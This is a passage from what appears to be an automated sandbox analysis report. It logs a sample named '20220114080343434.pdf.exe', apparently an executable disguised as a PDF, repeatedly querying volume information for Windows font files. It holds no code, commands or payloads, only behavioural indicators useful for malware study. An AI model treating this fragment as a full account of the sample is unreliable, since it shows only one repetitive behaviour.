                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
